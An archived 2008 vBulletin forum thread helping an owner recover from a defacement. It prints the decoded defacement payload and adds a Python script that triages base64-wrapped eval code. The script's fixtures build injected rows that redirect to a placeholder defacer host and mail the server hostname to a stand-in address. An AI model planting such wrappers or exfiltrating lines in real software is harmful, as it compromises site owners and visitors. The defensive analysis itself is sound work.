vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   Forum and Server Management (https://vborg.vbsupport.ru/forumdisplay.php?f=232)
-   -   Got hacked. What now? (https://vborg.vbsupport.ru/showthread.php?t=193796)

Berethorn 10-16-2008 11:34 PM

Alright. I'll try to beef up the guard. :)

Quarterbore 10-16-2008 11:53 PM

I would be curious to see the code they added if you can send me a PM with the encrypted code. I am sure it is just an encrypted refresh, but I will see if I can decrypt it. I have been studying the enemy for a while and there probably isn't much I can get from the code, but I would still like to see it for basic syntax.

You obviously have something they were able to take advantage of to do a SQL injection. So, as suggested, get the forums upgraded and evaluate the hacks you have added. Also, don't forget to get the automated database backups running, because if they did this, the hacker could have deleted your entire database as well!

TheLastSuperman 10-17-2008 12:08 AM

Ok, guilty as charged... I skimmed a bit...

Here's what I would do:

Make a backup now instead of tinkering w/ the only (although hacked) full version of your database that exists. Make a copy of that and tinker w/ it!

Check the FTP or File Manager for recently modified files or folders and review the code. Also make sure that however you're viewing the files, it's not hiding any from your view.

As for restoring a large DB try bigdump.php or SQLyog Enterprise and give it a shot!

S-MAN

Berethorn 10-17-2008 12:09 AM

Yes, luckily it wasn't a destructive hack; more of an informative one. I'll send it to you in a sec.

Unfortunately I have to pay $60 to renew to download anything above 3.6.8. I don't think it's feasible for me now.

Quarterbore 10-17-2008 12:26 AM

Thanks for the code, and for your reference, you should never send code like that unmodified. For example, if you get encrypted code like that, modify the start of the encrypted code so it is changed...

From: eval(base64_decode('

To: eval(baNOCODEse64_decNOTode('

The code cannot be executed! You really have to be careful with encrypted code like that, as you never know everything it does until it is decrypted. Luckily, there are tools out there that can decrypt stuff pretty darned easily anymore.

--------------- Added 10-17-2008 01:35 AM ---------------

I decrypted the code and it was relatively harmless HTML code. There was nothing in there to log passwords, as an example.

I am posting the code here just for the record and so you can see it. That nonsense of letters and numbers when decoded is the code that follows!

PHP Code:

echo "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">
<!-- saved from url=(0026)http://woot.king-nerd.com/ -->
<HTML 
dir=rtl><HEAD><TITLE>:.: Hacked By ِAb0-Salem :.:</TITLE>
<SCRIPT language=javascript src=\"index4_files/ads.js\"></SCRIPT>

<META http-equiv=Content-Type content=\"text/html; charset=windows-1256\">
<META http-equiv=Content-Language content=en-us>
<STYLE>TABLE.MsoNormalTable {
    FONT-SIZE: 10pt; FONT-FAMILY: \"Times New Roman\"; mso-style-parent: \"\"
}
.page {
    BACKGROUND: #000000; FONT: bold 12pt arial,verdana,helvetica,sans-serif; COLOR: #acacac
}
.vbmenu_popup {
    BORDER-RIGHT: #21728f 1px solid; BORDER-TOP: #21728f 1px solid; BACKGROUND: #000000; FONT: 8pt ms sans serif,arial; BORDER-LEFT: #21728f 1px solid; COLOR: #acacac; BORDER-BOTTOM: #21728f 1px solid
}
.thead {
    FONT-WEIGHT: normal; FONT-SIZE: 8pt; BACKGROUND: #000000 repeat-x left top; COLOR: #ebebeb; FONT-STYLE: normal; FONT-FAMILY: ms sans serif, arial; FONT-VARIANT: normal
}
TD.thead {
    PADDING-RIGHT: 4px; PADDING-LEFT: 4px; PADDING-BOTTOM: 4px; PADDING-TOP: 4px
}
.tborder {
    BACKGROUND: #000000
}
.alt1 {
    BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #acacac
}
DIV {
    COLOR: #000
}
DIV {
    FONT-FAMILY: arial,sans-serif
}
DIV.Section1 {
    page: Section1
}
</STYLE>
<BGSOUND src=\"\" loop=infinite>
<META content=\"MSHTML 6.00.2900.3314\" name=GENERATOR></HEAD>
<BODY text=#c0c0c0 vLink=#c0c0c0 aLink=#c0c0c0 link=#c0c0c0 bgColor=#000000>
<P></P>&nbsp;
<SCRIPT language=JavaScript> if (document.all){ Cols=15; Cl=24; Cs=50; Ts=12;  Tc='#008800'; Tc1='red'; MnS=25;  MxS=30;  I=Cs; Sp=new Array();S=new Array();Y=new Array(5,6); C=new Array();M=new Array();B=new Array(); RC=new Array();E=new Array();Tcc=new Array(\"x\",\"h\",\"a\",\"h\",1,\"x\"); document.write(\"<div id='Container' style='position:absolute;top:0;left:-\"+Cs+\"'>\"); document.write(\"<div style='position:relative'>\"); for(i=0; i < Cols; i++){ S[i]=I+=Cs; document.write(\"<div id='A' style='position:absolute;top:0;font-family:Arial;font-size:\" +Ts+\"px;left:\"+S[i]+\";width:\"+Ts+\"px;height:0px;color:\"+Tc+\";visibility:hidden'></div>\"); } document.write(\"</div></div>\"); for(j=0; j < Cols; j++){ RC[j]=1+Math.round(Math.random()*Cl);   Y[j]=0; Sp[j]=Math.round(MnS+Math.random()*MxS);  for(i=0; i < RC[j]; i++){ B[i]=''; C[i]=Math.round(Math.random()*1)+' '; M[j]=B[0]+=C[i]; } } function Cycle(){ Container.style.top=window.document.body.scrollTop; for (i=0; i < Cols; i++){ var r = Math.floor(Math.random()*Tcc.length); E[i] = '<font color='+Tc1+'>'+Tcc[r]+'</font>'; Y[i]+=Sp[i]; if (Y[i] > window.document.body.clientHeight){ for(i2=0; i2 < Cols; i2++){ RC[i2]=1+Math.round(Math.random()*Cl);   for(i3=0; i3 < RC[i2]; i3++){ B[i3]=''; C[i3]=Math.round(Math.random()*1)+' '; C[Math.floor(Math.random()*i2)]=' '+' '; M[i]=B[0]+=C[i3]; Y[i]=-Ts*M[i].length/1; A[i].style.visibility='visible'; } Sp[i]=Math.round(MnS+Math.random()*MxS); } } A[i].style.top=Y[i]; A[i].innerHTML=M[i]+' '+E[i]+' '; } setTimeout('Cycle()',50) } Cycle(); } </SCRIPT>

<SCRIPT language=JavaScript> puchtit=\"] Ab0-Salem [\"; letrero2=\"·.¸¸.·´´¯`··._.··.¸¸.·´´¯`··._.··.¸¸.·´´¯\"; letrero1=\"·.¸¸.·´´¯`··._.··.¸¸.·´´¯`··._.··.¸¸.·´´¯\";;ultimo1=letrero1.length-1; ultimo2=letrero2.length-1; tiempo=setTimeout(\"scroll()\",.1); function scroll() { aux1=letrero1.charAt(ultimo1-1); letrero1=aux1+letrero1.substring(0,ultimo1-1); aux2=letrero2.charAt(0); letrero2=letrero2.substring(1,ultimo2+1)+aux2; window.status=\"(\" + letrero2 + puchtit + letrero1 + \")\"; tiempo=setTimeout(\"scroll()\",.1); return true; } // --> </SCRIPT>
 
<DIV style=\"COLOR: #000; FONT-FAMILY: arial,sans-serif\" align=center><SPAN 
style=\"HEIGHT: 30px\">
<DIV class=Section1>
<DIV 
style=\"WIDTH: 900px; COLOR: rgb(0,0,0); FONT-FAMILY: arial,sans-serif; HEIGHT: 374px\" 
align=center>
<TABLE style=\"WIDTH: 90%\" height=500 cellPadding=0 width=\"90%\" border=0>
  <TBODY>
  <TR>
    <TD 
    style=\"BORDER-RIGHT: red 0.75pt solid; PADDING-RIGHT: 0.75pt; BORDER-TOP: red 0.75pt solid; PADDING-LEFT: 0.75pt; FONT-WEIGHT: normal; FONT-SIZE: 14pt; PADDING-BOTTOM: 0.75pt; BORDER-LEFT: red 0.75pt solid; COLOR: rgb(28,176,129); PADDING-TOP: 0.75pt; BORDER-BOTTOM: red 0.75pt solid; FONT-STYLE: normal; FONT-FAMILY: verdana,geneva,lucida,'lucida grande',arial,helvetica,sans-serif; FONT-VARIANT: normal\"></FONT></B></FONT></FONT>
      <P align=center><SPAN lang=ar-sa><B><FONT face=\"Traditional Arabic\" 
      color=#ffffff size=5></FONT></B></SPAN>&nbsp;</P>
      <P dir=ltr align=center><B><FONT face=Verdana color=#e0e0e0>H0 H0, You G0t 
        Defaced<SPAN lang=en-us> Just Be CoOol And Learn</SPAN> 
      !</FONT></B></P><SPAN>
      <P align=center>&nbsp;</P></SPAN>
      <FONT face=\"Arial Narrow\" size=4>
    <P align=center>
    &nbsp;</P><SPAN>
      <P dir=ltr align=center><B><FONT face=Verdana color=#00ff00 
      size=5>&nbsp;</FONT></B><FONT face=Verdana color=#00ff00 
      size=5>[</FONT><B><FONT face=Verdana color=#00ff00 size=5> W3 Do Wh4t w3 
        s4y</FONT></B><FONT face=Verdana color=#00ff00 size=5> ]<SPAN 
      lang=ar-eg>&nbsp; </SPAN></FONT></P>
      <P dir=ltr align=center>&nbsp;</P>
      <P dir=ltr align=center>&nbsp;</P>
      <P dir=ltr align=center><SPAN style=\"TEXT-TRANSFORM: uppercase\"><FONT 
      face=\"Monotype Corsiva\"><SPAN lang=en-us><FONT color=#ffffff size=6>HaCkEd 
        By ;</FONT></SPAN></FONT></SPAN></P>
      <P dir=ltr align=center>&nbsp;</P>
      <P dir=ltr align=center><B><FONT face=Verdana 
      size=5>&nbsp;</FONT></B><FONT face=Verdana color=#999999 
      size=5>[</FONT><B><FONT face=Verdana color=#e0e0e0 size=5> Ab0-Salem 
      </FONT></B><FONT face=Verdana color=#999999 size=5>]</FONT></P>
      <P dir=ltr style=\"TEXT-ALIGN: center\"><FONT face=\"Courier New\" 
      color=#999999 size=4><B>Wh3r3 is The Security Dude ?</B></FONT></P>
      <P dir=ltr style=\"TEXT-ALIGN: center\"><B><FONT face=\"Courier New\" 
      color=#999999 size=4>&nbsp;Yeah, IT Seems Security Doomed to FAILURE 
      </FONT><FONT face=\"Microsoft Sans Serif\" color=#999999 size=4>(^_*) .. 
      </FONT></B></P>
      <P align=center><B><FONT face=Verdana color=#999999 size=2>Just Secure 
        Your Mind , Then Secure Your Site Dude !</FONT></B></P></SPAN>
      <P align=center><SPAN lang=ar-sa><FONT color=#ff00ff 
      size=4>==--===</FONT><FONT size=4><FONT 
      color=#ffff00>--===--===--=</FONT><FONT 
      color=#ff0000>==--===--===</FONT><FONT color=#ffff00>--===--</FONT><FONT 
      color=#008000>===--===--=</FONT></FONT><FONT color=#ffff00 
      size=4>==</FONT></SPAN></P>
      <P dir=ltr style=\"TEXT-ALIGN: center\"><FONT face=Verdana color=#ffffff>W3 
        M4k3 Th!s ++++en N3t</P>
      <P dir=ltr style=\"TEXT-ALIGN: center\">Try To Play With Us And U Will Know 
        The W3 r Th3 G4m3</FONT></P><SPAN>
      <P align=center><SPAN lang=ar-sa><FONT color=#ff00ff 
      size=4>==--===</FONT><FONT size=4><FONT 
      color=#ffff00>--===--===--=</FONT><FONT 
      color=#ff0000>==--===--===</FONT><FONT color=#ffff00>--===--</FONT><FONT 
      color=#008000>===--===--=</FONT></FONT><FONT color=#ffff00 
      size=4>==</FONT></SPAN></P></SPAN>
      <P align=center>&nbsp;</P><SPAN>
      <P dir=ltr align=center><B><FONT face=Verdana 
      size=5>&nbsp;</FONT></B><FONT face=Verdana color=#ff0000 
      size=5>[</FONT><B><FONT face=Verdana color=#e0e0e0 size=5> 
      Ab0-Salem</FONT></B><FONT face=Verdana color=#ff0000 
      size=5>]</FONT></P></SPAN>
      <P align=center><SPAN><FONT face=Verdana color=#ff0000 size=5><A 
      href=\"\"></A></FONT></SPAN></P>
      <P dir=ltr align=center><FONT face=Verdana color=#ff0000 size=5><A 
      ></A></FONT></P><SPAN>
      <P dir=ltr align=center>&nbsp;</P>
      <P dir=ltr align=center>&nbsp;</P></SPAN>
      <P align=center>&nbsp;</P>
      <P dir=rtl style=\"DIRECTION: rtl; unicode-bidi: embed\" align=center><EMBED 
      name=video pluginspage=http://www.real.com/player/ 
      src=http://www.members.lycos.co.uk/sn1p3r/mu/nana.rm width=165 height=62 
      hidden=true type=audio/x-pn-realaudio-plugin loop=\"true\" autostart=\"true\" 
      nojava=\"true\" controls=\"ControlPanel,StatusBar\" maintainaspect=\"false\"> 
      </P></TR></TBODY></TABLE></DIV></DIV></SPAN></DIV></BODY></HTML>
"



Berethorn 10-17-2008 12:42 AM

Oh dear, that was clumsy of me. :(

Hornstar 11-01-2008 03:50 AM

Quote:

Originally Posted by Quarterbore (Post 1646713)
...try looking for "REFRESH" or "HTTP-EQUIV"

I know you don't know me, but if you would like help I would be glad to try to help; the only way I could do that is to get access to your database. I am very curious how they did this for the tool I am coding, hence my interest.

EDIT: you are searching like this, right:

%refresh%
%http-equiv%
%index4_files%

I ask as I get hits for the first two and my site is not hacked. But there are not many of them, so you can look at them to find the cause.

Also search for this if you are not finding anything...

%base64%

I searched my database for %base64% and found quite a fair few hits but can not determine which are legit or not.

My site got hacked last week and I found a different method to get my templates showing up instead of the hacked version; however, I still have a couple of the hacked templates up as I have not had time to change those just yet.

Any idea what table name, or what kind of code i should be looking for more exactly?

Quarterbore 11-03-2008 06:02 PM

There shouldn't be any base 64 scripts in your forums ;)

puertoblack2003 11-04-2008 01:31 AM

How is that even embedded? Is it a badly written mod?

Hornstar 11-05-2008 06:07 AM

Quote:

Originally Posted by Quarterbore (Post 1658765)
There shouldn't be any base 64 scripts in your forums ;)

What should I do?

Search results for "%base64%" at least one of the words:
2 match(es) inside table vb3_datastore
4 match(es) inside table vb3_plugin
2 match(es) inside table vb3_pmtext
4 match(es) inside table vb3_post
3 match(es) inside table vb3_postedithistory
1 match(es) inside table vb3_postparsed
1 match(es) inside table vb3_word

Total: 17

Example: Table: vb3_word

Code:

SQL query:
SELECT *
FROM `***_***`.`vb3_word`
WHERE ( `wordid` LIKE '%%base64%%'
    OR `title` LIKE CONVERT( _utf8 '%%base64%%' USING latin1 ) COLLATE latin1_swedish_ci )
LIMIT 0 , 30


Wordid: 57647
title:
base64


Example: table vb3_plugin
Code:

SQL query:
SELECT *
FROM `***_***`.`vb3_plugin`
WHERE ( `pluginid` LIKE '%%base64%%'
    OR `title` LIKE CONVERT( _utf8 '%%base64%%' USING latin1 ) COLLATE latin1_swedish_ci
    OR `hookname` LIKE CONVERT( _utf8 '%%base64%%' USING latin1 ) COLLATE latin1_swedish_ci
    OR `phpcode` LIKE CONVERT( _utf8 '%%base64%%' USING latin1 ) COLLATE latin1_swedish_ci
    OR `product` LIKE CONVERT( _utf8 '%%base64%%' USING latin1 ) COLLATE latin1_swedish_ci
    OR `devkey` LIKE CONVERT( _utf8 '%%base64%%' USING latin1 ) COLLATE latin1_swedish_ci
    OR `active` LIKE '%%base64%%'
    OR `executionorder` LIKE '%%base64%%' )
LIMIT 0 , 30

Code:

$attachpatch_patchfirstpost = array ();
global $foruminfo, $vbulletin;

if (!empty ($vbulletin->options['attachpatch_patchfirstpost'])) {
    $attachpatch_patchfirstpost = preg_replace ('/[^0-9,]*/', '', $vbulletin->options['attachpatch_patchfirstpost']);
    $attachpatch_patchfirstpost = explode (',', $attachpatch_patchfirstpost);
}

if
(
    $vbulletin->options['attachpatch_enable']
    AND
    (
        in_array($foruminfo['forumid'], $attachpatch_patchfirstpost)
        OR
        $vbulletin->options['attachpatch_patchfirstpost'] == -1
    )
    AND
    $post['parentid'] == 0
)
{
    if (!isset ($attachpatchinfo))
    {
        // initialize my variables
        $attachpatchinfo = array ();
        $attachpatchinfo['mycounter'] = 0;    // counts loop iterations
        $attachpatchinfo['combinedfilesize'] = 0;
        $attachpatchinfo['moderatedattachments'] = '';
        $attachpatchinfo['showmoderatedattachments'] = false;
        $attachpatchinfo['visibleattachments'] = false;
        $attachpatchinfo['attachmentids'] = array ();
        $attachpatchinfo['dateline'] = 0;
        $attachpatchinfo['counter'] = 0;    // this is the vB download counter for the attachment
    }

    // count attachments to know the last time we go thru the loop
    ++$attachpatchinfo['mycounter'];

    if ($attachment['visible'])
    {
        // do the necessary stuff from the original loop in the function
        // skip the various built-in vb templates (image/thumbnail etc)
        if (THIS_SCRIPT == 'external')
        {
            $attachment['counter'] = $vbphrase['n_a'];
            $show['views'] = false;
        }
        else
        {
            $show['views'] = true;
        }

        // remember that there is at least one visible (not moderated) attachment
        $attachpatchinfo['visibleattachments'] = true; 

        // add up total filesize of non-moderated attachments
        $attachpatchinfo['combinedfilesize'] += $attachment['filesize_real'];

        // save the attachment ids, dateline & counter to output in the template
        $attachpatchinfo['attachmentids'][] = $attachment['attachmentid'];
        $attachpatchinfo['dateline'] = $attachment['dateline']; // dateline & counter will end up being that of the
        $attachpatchinfo['counter'] = $attachment['counter'];  // last attachment, but that should suffice.
    }
    else
    {
        // do default vb moderated attachments (but save 'em to our variable)
        eval('$attachpatchinfo[\'moderatedattachments\'] .= "' . fetch_template('postbit_attachmentmoderated') . '";');
        $attachpatchinfo['showmoderatedattachments'] = true;
    }

    // set to false so that the vB original loop does less
    // it does a moderated attachment instead of the real ones.
    // which will have to be erased later.
    $attachment['visible'] = false;

    // last time thru the loop, save the info for later.
    if ($attachpatchinfo['mycounter'] == $attachcount)
    {
        // format the filesize nicely
        $attachpatchinfo['combinedfilesizepretty'] = vb_number_format($attachpatchinfo['combinedfilesize'], 1, true);

        // save the whole she-bang for the next plugin.
        $this->post['attachpatchinfo'] = $attachpatchinfo;

        // we know there's at least one visible (not moderated) attachment
        if ($attachpatchinfo['visibleattachments'])
        {
            $attachpatchinfo['attachmentids'] = implode(',', $attachpatchinfo['attachmentids']);
           
            global $threadinfo;
            $attachpatchinfo['encodedthreadtitle'] = urlencode(base64_encode($threadinfo['title']));
           
            // process all attachments thru the postbit_attachmentszippedtogether template
            // do it here at the end, so it only gets done once.
            eval('$this->post[\'otherattachments\'] .= "' . fetch_template('postbit_attachmentszippedtogether') . '";');
            $show['otherattachment'] = true;
        }
    }
}
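Two posts above are doing the same job by hand: Quarterbore defangs and decodes an eval(base64_decode('...')) blob to see what it does, and Hornstar's `%base64%` search turns up 17 rows that cannot be sorted into legitimate and injected. The script below is an added example written for this thread, not code from vb.org or from vBulletin. It takes rows the way a LIKE search returns them, decodes any eval(base64_decode()) payload without ever running it, defangs the wrapper the way Quarterbore suggests, and separates a plugin that merely calls base64_encode() (like the attachment plugin in the post above) from an injected wrapper. The sample rows, the `{${...}}` template wrapper and the defacer hostname are constructed for the example; only the table and column names follow vBulletin 3.

```python
"""Triage vBulletin rows for base64-obfuscated code without executing any of it.

Added example for this thread, not code from vb.org or vBulletin. Table and
column names mirror vBulletin 3's plugin/template/post tables; the rows are
constructed here and the hostnames are placeholders.
"""
import base64
import re
from dataclasses import dataclass, field

# The wrapper seen on hacked boards: eval(base64_decode('...')), sometimes nested in
# gzinflate()/str_rot13(). Group 1 is the blob; whitespace inside it is tolerated.
OBFUSCATED_EVAL = re.compile(
    r"eval\s*\(\s*(?:(?:gzinflate|str_rot13)\s*\(\s*)*base64_decode\s*\(\s*['\"]"
    r"([A-Za-z0-9+/=\s]+)['\"]",
    re.I,
)

# What to look for in the decoded text; REFRESH / HTTP-EQUIV are the thread's own hints.
INDICATORS = {
    "meta_refresh": re.compile(r"http-equiv\s*=\s*['\"]?\s*refresh", re.I),
    "script_tag": re.compile(r"<script\b", re.I),
    "iframe": re.compile(r"<iframe\b", re.I),
    "defacement": re.compile(r"hacked\s+by|defaced", re.I),
    "php_eval": re.compile(r"\beval\s*\(", re.I),
    "remote_fetch": re.compile(r"\b(?:file_get_contents|curl_init|fsockopen)\s*\(", re.I),
}


@dataclass
class Finding:
    table: str
    row_id: int
    column: str
    verdict: str                      # "malicious", "suspicious" or "benign"
    indicators: list = field(default_factory=list)
    decoded_preview: str = ""


def defang(source: str) -> str:
    """Break the wrapper before pasting a sample anywhere, as Quarterbore suggests."""
    return source.replace("base64_decode(", "baNOCODEse64_decNOTode(").replace("eval(", "evNOTal(")


def decode_payload(blob: str) -> str:
    """Decode a blob to text for reading; tolerates wrapped lines and missing padding, never eval()s."""
    cleaned = re.sub(r"\s+", "", blob)
    cleaned += "=" * (-len(cleaned) % 4)
    try:
        return base64.b64decode(cleaned).decode("utf-8", errors="replace")
    except ValueError as exc:             # binascii.Error is a ValueError
        return f"<undecodable: {exc}>"


def triage_row(table: str, row_id: int, column: str, text: str):
    """Return a Finding for one row, or None when the row is plain text."""
    blobs = OBFUSCATED_EVAL.findall(text)
    if not blobs:
        # base64_encode()/base64_decode() without an eval() wrapper is what a legitimate
        # plugin (like the attachment one in the thread) looks like: note it, don't alarm.
        if re.search(r"base64_(?:en|de)code\s*\(", text, re.I):
            return Finding(table, row_id, column, "benign", ["base64 call without eval wrapper"])
        return None
    indicators, preview = [], ""
    for blob in blobs:
        decoded = decode_payload(blob)
        preview = preview or decoded[:80]
        for name, pattern in INDICATORS.items():
            if pattern.search(decoded) and name not in indicators:
                indicators.append(name)
    # eval(base64_decode()) has no business in a forum template or plugin even when the
    # payload matches nothing we know, so the floor is "suspicious".
    return Finding(table, row_id, column, "malicious" if indicators else "suspicious", indicators, preview)


def scan_rows(rows):
    """rows: iterable of (table, row_id, column, text) as a LIKE '%base64%' search returns them."""
    return [f for f in (triage_row(*row) for row in rows) if f is not None]


def summarize(findings):
    counts = {}
    for f in findings:
        counts[f.verdict] = counts.get(f.verdict, 0) + 1
    return counts


def _wrap(php: str, wrap_at: int = 0) -> str:
    """Build an injected line the way the attacker did (only used for the sample rows)."""
    blob = base64.b64encode(php.encode()).decode()
    if wrap_at:
        blob = blob[:wrap_at] + "\n" + blob[wrap_at:]
    return "eval(base64_decode('" + blob + "'));"


# Constructed sample rows (not real data); defacer.example and x.js are placeholders.
SAMPLE_ROWS = [
    ("vb3_plugin", 41, "phpcode",
     _wrap("echo '<meta http-equiv=\"refresh\" content=\"0;url=http://defacer.example/\">';")),
    ("vb3_template", 17, "template",
     "{${" + _wrap("echo '<title>Hacked By Example</title><script src=\"x.js\"></script>';", 24) + "}}"),
    ("vb3_plugin", 7, "phpcode",
     "$info['encodedthreadtitle'] = urlencode(base64_encode($threadinfo['title']));"),
    ("vb3_post", 1001, "pagetext", "Has anyone else found base64 in their templates?"),
    ("vb3_plugin", 42, "phpcode", _wrap('mail("x@example.org", "hi", $_SERVER["HTTP_HOST"]);')),
]

if __name__ == "__main__":
    for f in scan_rows(SAMPLE_ROWS):
        print(f"{f.table}#{f.row_id}.{f.column}: {f.verdict} {f.indicators} {f.decoded_preview!r}")
    print(summarize(scan_rows(SAMPLE_ROWS)))
```

Run it as a script to print a verdict per sample row; in practice feed it the phpcode and template columns pulled from vb3_plugin and vb3_template (and the datastore, which vBulletin also evaluates). A row whose payload decodes to nothing recognisable still comes back suspicious, because an eval() of a base64 blob has no place in a forum plugin whatever it hides, while a row that only talks about base64 in a post body produces no finding at all.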



All times are GMT.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.